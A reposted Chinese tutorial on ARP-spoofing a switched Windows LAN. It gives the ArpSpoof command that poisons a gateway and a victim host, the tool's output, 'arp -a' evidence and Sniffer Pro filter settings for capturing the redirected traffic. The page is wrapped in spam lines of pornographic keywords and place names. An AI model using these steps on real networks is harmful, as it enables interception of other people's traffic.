国产成人精品亚洲777人妖,欧美日韩精品一区视频,最新亚洲国产,国产乱码精品一区二区亚洲

您的位置:首頁技術文章
文章詳情頁

Windows交換環境中ARP Sniffer的實現

瀏覽:4日期:2024-02-17 14:31:23
根據交換環境中Sniffer實現的原理(詳見交換環境下Sniffer的實現),我寫了一個類似于Linux環境下的ArpSpoof實現在Windows環境下的Arp Sniffer。在交換環境下Windows中實現Sniffer需要具備的條件:1、安裝Winpcap驅動。2、我寫了一個類似于Linux環境下的ArpSpoof(我只在windows 2000 Server下測試過,其他期待您的測試)。3、一個Sniffer,如NetXray或者NAI Sniffer Pro(推薦)。具體的實現方法:使用ArpSpoof實現基于ARP的欺騙:C:>arpspoof.exeARPSpoof, by netXeyes, Special Thanks BBwww.netXeyes.com 2002, dansnow@21cn.comUsage: ArpSpoof [Spoof IP1] [Spoof IP2] [Own IP] 其中Spoof IP1和Spoof IP2是想要進行欺騙和嗅探的IP地址,Own IP是自己的IP地址(注重這三個IP必須是在同一個局域網內沒有跨越交換機或者路由器)。例如目前公司的局域網環境為192.168.0.xxx,子網掩碼為255.255.255.0,網關為192.168.0.1。我們的IP為192.168.0.29,想要Sniffer 192.168.0.2的數據包。由于網關為192.168.0.1,所以我們就只要欺騙192.168.0.1和192.168.0.2就可以了。也就是說告訴192.168.0.1,192.168.0.2的MAC地址是自己(192.168.0.29);然后再告訴192.168.0.2, 192.168.0.1的MAC地址是自己(192.168.0.29)。這樣以來所有的數據包都會發到192.168.0.29,并且由192.168.0.29實現轉發(windows 2000默認可以進行包轉發,至于Windows 9.x和Windows NT/XP我沒有測試過,希望您可以告訴我)。C:>arpspoof.exe 192.168.0.1 192.168.0.2 192.168.0.29ARPSpoof, by netXeyes, Special Thanks BBwww.netXeyes.com 2002, dansnow@21cn.comBegin Spoof.........Spoof 192.168.0.1: Mac of 192.168.0.2 ===> Mac of 192.168.0.29Spoof 192.168.0.2: Mac of 192.168.0.1 ===> Mac of 192.168.0.29Spoof 192.168.0.1: Mac of 192.168.0.2 ===> Mac of 192.168.0.29Spoof 192.168.0.2: Mac of 192.168.0.1 ===> Mac of 192.168.0.29Spoof 192.168.0.1: Mac of 192.168.0.2 ===> Mac of 192.168.0.29Spoof 192.168.0.2: Mac of 192.168.0.1 ===> Mac of 192.168.0.29.....................................................是時候對192.168.0.1和192.168.0.2的ARP欺騙就開始了,在192.168.0.1上面使用arp -a命令可以看到192.168.0.2和192.168.0.29的MAC地址是一樣的。C:>arp -aInterface: 192.168.0.1 on Interface 0x1000004Internet Address Physical Address Type192.168.0.2 00-00-86-61-6b-4e dynamic192.168.0.29 00-00-86-61-6b-4e dynamic同樣在192.168.0.2上面也會發現192.168.0.1和192.168.0.29的MAC地址是一樣的。這樣我們就在192.168.0.1和192.168.0.2之間實現了ARP欺騙。啟動Sniffer Pro,在Define Filter里面的Address Type中選擇Hardware(注重不要選為通常的類型IP,否則抓不到什么有意義的東西),Station1和Station2選擇設置為Any即可。這時候就開始Sniffer了。以上結果在我局域網環境中測試通過,不保證適用于所有的環境。在開發及測試的過程中得到了BB的大力協助,以至于耽誤了其看八卦新聞的時間,內疚了很久......:-)

(出處:http://www.vipcn.com)

標簽: Windows系統
相關文章:
主站蜘蛛池模板: 阳城县| 太白县| 五指山市| 墨江| 盘锦市| 安阳市| 象州县| 花莲县| 长寿区| 大庆市| 图片| 金溪县| 淮滨县| 湟中县| 湘乡市| 望都县| 芮城县| 宝应县| 正蓝旗| 驻马店市| 昌图县| 克拉玛依市| 吴忠市| 专栏| 临澧县| 舒城县| 上饶县| 城步| 三门峡市| 高州市| 安康市| 建德市| 绵阳市| 乐都县| 衡山县| 江口县| 华宁县| 手机| 克拉玛依市| 土默特左旗| 靖西县|